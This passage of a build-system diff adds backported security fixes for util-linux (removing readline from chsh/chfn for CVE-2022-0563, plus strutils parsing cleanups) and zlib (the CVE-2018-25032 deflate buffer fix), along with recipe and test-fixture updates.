+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
+index e15b467016..87b421d2ef 100644
+--- a/tests/ts/findmnt/files/mountinfo-nonroot
++++ b/tests/ts/findmnt/files/mountinfo-nonroot
+@@ -29,4 +29,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
+index c063071833..2b01740481 100644
+--- a/tests/ts/libmount/files/mountinfo
++++ b/tests/ts/libmount/files/mountinfo
+@@ -30,5 +30,4 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+ 49 20 0:56 / /mnt/test/foo bar rw,relatime shared:323 - tmpfs tmpfs rw
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
+From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Thu, 10 Feb 2022 12:03:17 +0100
+Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
+
+The readline library uses the INPUTRC= environment variable to get a path
+to the library config file. When the library cannot parse the
+specified file, it prints an error message containing data from the
+file.
+
+Unfortunately, the library does not use secure_getenv() (or a similar
+concept) to avoid vulnerabilities that could occur in set-user-ID or
+set-group-ID programs.
+
+Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17]
+
+CVE: CVE-2022-0563
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ login-utils/Makemodule.am | 2 +-
+ login-utils/chfn.c | 16 +++------------
+ login-utils/chsh.c | 42 ++-------------------------------------
+ 3 files changed, 6 insertions(+), 54 deletions(-)
+
+diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
+index fac5bfc..73636af 100644
+--- a/login-utils/Makemodule.am
++++ b/login-utils/Makemodule.am
+@@ -82,7 +82,7 @@ chfn_chsh_sources = \
+ login-utils/ch-common.c
+ chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
+ chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
+-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
++chfn_chsh_ldadd = libcommon.la
+
+ if CHFN_CHSH_PASSWORD
+ chfn_chsh_ldadd += -lpam
+diff --git a/login-utils/chfn.c b/login-utils/chfn.c
+index b739555..2f8e44a 100644
+--- a/login-utils/chfn.c
++++ b/login-utils/chfn.c
+@@ -56,11 +56,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct finfo {
+ char *full_name;
+ char *office;
+@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
+ {
+ int len;
+ char *buf;
+-#ifndef HAVE_LIBREADLINE
+- size_t dummy = 0;
+-#endif
+
+ if (!def_val)
+ def_val = "";
++
+ while (true) {
+ printf("%s [%s]: ", question, def_val);
+ __fpurge(stdin);
+-#ifdef HAVE_LIBREADLINE
+- rl_bind_key('\t', rl_insert);
+- if ((buf = readline(NULL)) == NULL)
+-#else
++
+ if (getline(&buf, &dummy, stdin) < 0)
+-#endif
+ errx(EXIT_FAILURE, _("Aborted."));
++
+ /* remove white spaces from string end */
+ ltrim_whitespace((unsigned char *) buf);
+ len = rtrim_whitespace((unsigned char *) buf);
+diff --git a/login-utils/chsh.c b/login-utils/chsh.c
+index a9ebec8..ee6ff87 100644
+--- a/login-utils/chsh.c
++++ b/login-utils/chsh.c
+@@ -58,11 +58,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct sinfo {
+ char *username;
+ char *shell;
+@@ -121,33 +116,6 @@ static void print_shells(void)
+ endusershell();
+ }
+
+-#ifdef HAVE_LIBREADLINE
+-static char *shell_name_generator(const char *text, int state)
+-{
+- static size_t len;
+- char *s;
+-
+- if (!state) {
+- setusershell();
+- len = strlen(text);
+- }
+-
+- while ((s = getusershell())) {
+- if (strncmp(s, text, len) == 0)
+- return xstrdup(s);
+- }
+- return NULL;
+-}
+-
+-static char **shell_name_completion(const char *text,
+- int start __attribute__((__unused__)),
+- int end __attribute__((__unused__)))
+-{
+- rl_attempted_completion_over = 1;
+- return rl_completion_matches(text, shell_name_generator);
+-}
+-#endif
+-
+ /*
+ * parse_argv () --
+ * parse the command line arguments, and fill in "pinfo" with any
+@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
+ {
+ int len;
+ char *ans = NULL;
+-#ifdef HAVE_LIBREADLINE
+- rl_attempted_completion_function = shell_name_completion;
+-#else
+ size_t dummy = 0;
+-#endif
++
+ if (!oldshell)
+ oldshell = "";
+ printf("%s [%s]\n", question, oldshell);
+-#ifdef HAVE_LIBREADLINE
+- if ((ans = readline("> ")) == NULL)
+-#else
+ if (getline(&ans, &dummy, stdin) < 0)
+-#endif
+ return NULL;
++
+ /* remove the newline at the end of ans. */
+ ltrim_whitespace((unsigned char *) ans);
+ len = rtrim_whitespace((unsigned char *) ans);
+--
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
+From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 22 Jun 2021 14:20:42 +0200
+Subject: [PATCH] include/strutils: cleanup strto..() functions
+
+* add ul_strtos64() and ul_strtou64()
+* add simple test
+
+Addresses: https://github.com/karelzak/util-linux/issues/1358
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 3 +
+ lib/strutils.c | 174 ++++++++++++++++++++++++++-------------------
+ 2 files changed, 105 insertions(+), 72 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index e75a2f0e17..389e849905 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
+ extern int strtosize(const char *str, uintmax_t *res);
+ extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
+
++extern int ul_strtos64(const char *str, int64_t *num, int base);
++extern int ul_strtou64(const char *str, uint64_t *num, int base);
++
+ extern int16_t strtos16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
+diff --git a/lib/strutils.c b/lib/strutils.c
+index ee2c835495..d9976dca70 100644
+--- a/lib/strutils.c
++++ b/lib/strutils.c
+@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
+ }
+ #endif
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
++/*
++ * convert strings to numbers; returns <0 on error, and 0 on success
++ */
++int ul_strtos64(const char *str, int64_t *num, int base)
++{
++ char *end = NULL;
+
+-int16_t strtos16_or_err(const char *str, const char *errmesg)
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (int64_t) strtoimax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
++}
++
++int ul_strtou64(const char *str, uint64_t *num, int base)
+ {
+- int32_t num = strtos32_or_err(str, errmesg);
++ char *end = NULL;
+
+- if (num < INT16_MIN || num > INT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+- }
+- return num;
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (uint64_t) strtoumax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
+ }
+
+-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
++/*
++ * Convert strings to numbers and print message on error.
++ *
++ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
++ * something else then use ul_strtos64(s, &n, 16).
++ */
++int64_t strtos64_or_err(const char *str, const char *errmesg)
+ {
+- uint32_t num = _strtou32_or_err(str, errmesg, base);
++ int64_t num = 0;
+
+- if (num > UINT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ if (ul_strtos64(str, &num, 10) != 0) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+ }
+ return num;
+ }
+
+-uint16_t strtou16_or_err(const char *str, const char *errmesg)
++uint64_t strtou64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 10);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 10)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint16_t strtox16_or_err(const char *str, const char *errmesg)
++uint64_t strtox64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 16);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 16)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ int32_t strtos32_or_err(const char *str, const char *errmesg)
+@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
+ return num;
+ }
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
++uint32_t strtou32_or_err(const char *str, const char *errmesg)
+ {
+- uint64_t num = _strtou64_or_err(str, errmesg, base);
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+ if (num > UINT32_MAX) {
+ errno = ERANGE;
+@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
+ return num;
+ }
+
+-uint32_t strtou32_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou32_or_err(str, errmesg, 10);
+-}
+-
+ uint32_t strtox32_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou32_or_err(str, errmesg, 16);
++ uint64_t num = strtox64_or_err(str, errmesg);
++
++ if (num > UINT32_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-int64_t strtos64_or_err(const char *str, const char *errmesg)
++int16_t strtos16_or_err(const char *str, const char *errmesg)
+ {
+- int64_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoimax(str, &end, 10);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ int64_t num = strtos64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num < INT16_MIN || num > INT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
++uint16_t strtou16_or_err(const char *str, const char *errmesg)
+ {
+- uintmax_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoumax(str, &end, base);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint64_t strtou64_or_err(const char *str, const char *errmesg)
++uint16_t strtox16_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou64_or_err(str, errmesg, 10);
+-}
++ uint64_t num = strtox64_or_err(str, errmesg);
+
+-uint64_t strtox64_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou64_or_err(str, errmesg, 16);
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ double strtod_or_err(const char *str, const char *errmesg)
+@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
+
+ int main(int argc, char *argv[])
+ {
+- if (argc == 3 && strcmp(argv[1], "--size") == 0)
++ if (argc == 3 && strcmp(argv[1], "--size") == 0) {
+ return test_strutils_sizes(argc - 1, argv + 1);
+
+- else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
++ } else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
+ return test_strutils_cmp_paths(argc - 1, argv + 1);
+
++ } else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
++ uint64_t n;
++
++ if (ul_strtou64(argv[2], &n, 10) == 0) {
++ printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
++ return EXIT_SUCCESS;
++ }
++ }
++
+ else {
+ fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
+- " %1$s --cmp-paths <path> <path>\n",
++ " %1$s --cmp-paths <path> <path>\n"
++ " %1$s --str2num <str>\n",
+ argv[0]);
+ exit(EXIT_FAILURE);
+ }
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
file://0001-include-cleanup-pidfd-inckudes.patch \
+ file://CVE-2021-37600.patch \
+ file://include-strutils-cleanup-strto-functions.patch \
+ file://CVE-2021-3995.patch \
+ file://CVE-2021-3996.patch \
+ file://CVE-2022-0563.patch \
"
SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
[Unit]
Description=Bind mount volatile @where@
-DefaultDependencies=false
+DefaultDependencies=no
Before=local-fs.target
RequiresMountsFor=@whatparent@ @whereparent@
ConditionPathIsReadWrite=@whatparent@
diff --git a/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
new file mode 100644
index 0000000000..5cb6183641
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
+CVE: CVE-2018-25032
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
+From: Mark Adler <madler@alumni.caltech.edu>
+Date: Tue, 17 Apr 2018 22:09:22 -0700
+Subject: [PATCH] Fix a bug that can crash deflate on some input when using
+ Z_FIXED.
+
+This bug was reported by Danilo Ramos of Eideticom, Inc. It has
+lain in wait 13 years before being found! The bug was introduced
+in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
+option forces the use of fixed Huffman codes. For rare inputs with
+a large number of distant matches, the pending buffer into which
+the compressed data is written can overwrite the distance symbol
+table which it overlays. That results in corrupted output due to
+invalid distances, and can result in out-of-bound accesses,
+crashing the application.
+
+The fix here combines the distance buffer and literal/length
+buffers into a single symbol buffer. Now three bytes of pending
+buffer space are opened up for each literal or length/distance
+pair consumed, instead of the previous two bytes. This assures
+that the pending buffer cannot overwrite the symbol table, since
+the maximum fixed code compressed length/distance is 31 bits, and
+since there are four bytes of pending space for every three bytes
+of symbol space.
+---
+ deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
+ deflate.h | 25 +++++++++----------
+ trees.c | 50 +++++++++++--------------------------
+ 3 files changed, 79 insertions(+), 70 deletions(-)
+
+diff --git a/deflate.c b/deflate.c
+index 425babc00..19cba873a 100644
+--- a/deflate.c
++++ b/deflate.c
+@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ int wrap = 1;
+ static const char my_version[] = ZLIB_VERSION;
+
+- ushf *overlay;
+- /* We overlay pending_buf and d_buf+l_buf. This works since the average
+- * output size for (length,distance) codes is <= 24 bits.
+- */
+-
+ if (version == Z_NULL || version[0] != my_version[0] ||
+ stream_size != sizeof(z_stream)) {
+ return Z_VERSION_ERROR;
+@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+
+ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+
+- overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+- s->pending_buf = (uchf *) overlay;
+- s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
++ /* We overlay pending_buf and sym_buf. This works since the average size
++ * for length/distance pairs over any compressed block is assured to be 31
++ * bits or less.
++ *
++ * Analysis: The longest fixed codes are a length code of 8 bits plus 5
++ * extra bits, for lengths 131 to 257. The longest fixed distance codes are
++ * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
++ * possible fixed-codes length/distance pair is then 31 bits total.
++ *
++ * sym_buf starts one-fourth of the way into pending_buf. So there are
++ * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
++ * in sym_buf is three bytes -- two for the distance and one for the
++ * literal/length. As each symbol is consumed, the pointer to the next
++ * sym_buf value to read moves forward three bytes. From that symbol, up to
++ * 31 bits are written to pending_buf. The closest the written pending_buf
++ * bits gets to the next sym_buf symbol to read is just before the last
++ * code is written. At that time, 31*(n-2) bits have been written, just
++ * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
++ * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
++ * symbols are written.) The closest the writing gets to what is unread is
++ * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
++ * can range from 128 to 32768.
++ *
++ * Therefore, at a minimum, there are 142 bits of space between what is
++ * written and what is read in the overlain buffers, so the symbols cannot
++ * be overwritten by the compressed data. That space is actually 139 bits,
++ * due to the three-bit fixed-code block header.
++ *
++ * That covers the case where either Z_FIXED is specified, forcing fixed
++ * codes, or when the use of fixed codes is chosen, because that choice
++ * results in a smaller compressed block than dynamic codes. That latter
++ * condition then assures that the above analysis also covers all dynamic
++ * blocks. A dynamic-code block will only be chosen to be emitted if it has
++ * fewer bits than a fixed-code block would for the same set of symbols.
++ * Therefore its average symbol length is assured to be less than 31. So
++ * the compressed data for a dynamic block also cannot overwrite the
++ * symbols from which it is being constructed.
++ */
++
++ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
++ s->pending_buf_size = (ulg)s->lit_bufsize * 4;
+
+ if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+ s->pending_buf == Z_NULL) {
+@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ deflateEnd (strm);
+ return Z_MEM_ERROR;
+ }
+- s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
+- s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
++ s->sym_buf = s->pending_buf + s->lit_bufsize;
++ s->sym_end = (s->lit_bufsize - 1) * 3;
++ /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
++ * on 16 bit machines and because stored blocks are restricted to
++ * 64K-1 bytes.
++ */
+
+ s->level = level;
+ s->strategy = strategy;
+@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
+
+ if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
+ s = strm->state;
+- if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
++ if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
+ return Z_BUF_ERROR;
+ do {
+ put = Buf_size - s->bi_valid;
+@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
+ #else
+ deflate_state *ds;
+ deflate_state *ss;
+- ushf *overlay;
+
+
+ if (deflateStateCheck(source) || dest == Z_NULL) {
+@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
+ ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
+ ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos));
+ ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos));
+- overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
+- ds->pending_buf = (uchf *) overlay;
++ ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
+
+ if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
+ ds->pending_buf == Z_NULL) {
+@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
+ zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
+
+ ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
+- ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
+- ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
++ ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
+
+ ds->l_desc.dyn_tree = ds->dyn_ltree;
+ ds->d_desc.dyn_tree = ds->dyn_dtree;
+@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+diff --git a/deflate.h b/deflate.h
+index 23ecdd312..d4cf1a98b 100644
+--- a/deflate.h
++++ b/deflate.h
+@@ -217,7 +217,7 @@ typedef struct internal_state {
+ /* Depth of each subtree used as tie breaker for trees of equal frequency
+ */
+
+- uchf *l_buf; /* buffer for literals or lengths */
++ uchf *sym_buf; /* buffer for distances and literals/lengths */
+
+ uInt lit_bufsize;
+ /* Size of match buffer for literals/lengths. There are 4 reasons for
+@@ -239,13 +239,8 @@ typedef struct internal_state {
+ * - I can't count above 4
+ */
+
+- uInt last_lit; /* running index in l_buf */
+-
+- ushf *d_buf;
+- /* Buffer for distances. To simplify the code, d_buf and l_buf have
+- * the same number of elements. To use different lengths, an extra flag
+- * array would be necessary.
+- */
++ uInt sym_next; /* running index in sym_buf */
++ uInt sym_end; /* symbol table full when sym_next reaches this */
+
+ ulg opt_len; /* bit length of current block with optimal trees */
+ ulg static_len; /* bit length of current block with static trees */
+@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
+
+ # define _tr_tally_lit(s, c, flush) \
+ { uch cc = (c); \
+- s->d_buf[s->last_lit] = 0; \
+- s->l_buf[s->last_lit++] = cc; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = cc; \
+ s->dyn_ltree[cc].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ # define _tr_tally_dist(s, distance, length, flush) \
+ { uch len = (uch)(length); \
+ ush dist = (ush)(distance); \
+- s->d_buf[s->last_lit] = dist; \
+- s->l_buf[s->last_lit++] = len; \
++ s->sym_buf[s->sym_next++] = dist; \
++ s->sym_buf[s->sym_next++] = dist >> 8; \
++ s->sym_buf[s->sym_next++] = len; \
+ dist--; \
+ s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
+ s->dyn_dtree[d_code(dist)].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ #else
+ # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
+diff --git a/trees.c b/trees.c
+index 4f4a65011..decaeb7c3 100644
+--- a/trees.c
++++ b/trees.c
+@@ -416,7 +416,7 @@ local void init_block(s)
+
+ s->dyn_ltree[END_BLOCK].Freq = 1;
+ s->opt_len = s->static_len = 0L;
+- s->last_lit = s->matches = 0;
++ s->sym_next = s->matches = 0;
+ }
+
+ #define SMALLEST 1
+@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
+
+ Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
+ opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
+- s->last_lit));
++ s->sym_next / 3));
+
+ if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
+
+@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ unsigned dist; /* distance of matched string */
+ unsigned lc; /* match length-MIN_MATCH or unmatched char (if dist==0) */
+ {
+- s->d_buf[s->last_lit] = (ush)dist;
+- s->l_buf[s->last_lit++] = (uch)lc;
++ s->sym_buf[s->sym_next++] = dist;
++ s->sym_buf[s->sym_next++] = dist >> 8;
++ s->sym_buf[s->sym_next++] = lc;
+ if (dist == 0) {
+ /* lc is the unmatched char */
+ s->dyn_ltree[lc].Freq++;
+@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
+ s->dyn_dtree[d_code(dist)].Freq++;
+ }
+-
+-#ifdef TRUNCATE_BLOCK
+- /* Try to guess if it is profitable to stop the current block here */
+- if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
+- /* Compute an upper bound for the compressed length */
+- ulg out_length = (ulg)s->last_lit*8L;
+- ulg in_length = (ulg)((long)s->strstart - s->block_start);
+- int dcode;
+- for (dcode = 0; dcode < D_CODES; dcode++) {
+- out_length += (ulg)s->dyn_dtree[dcode].Freq *
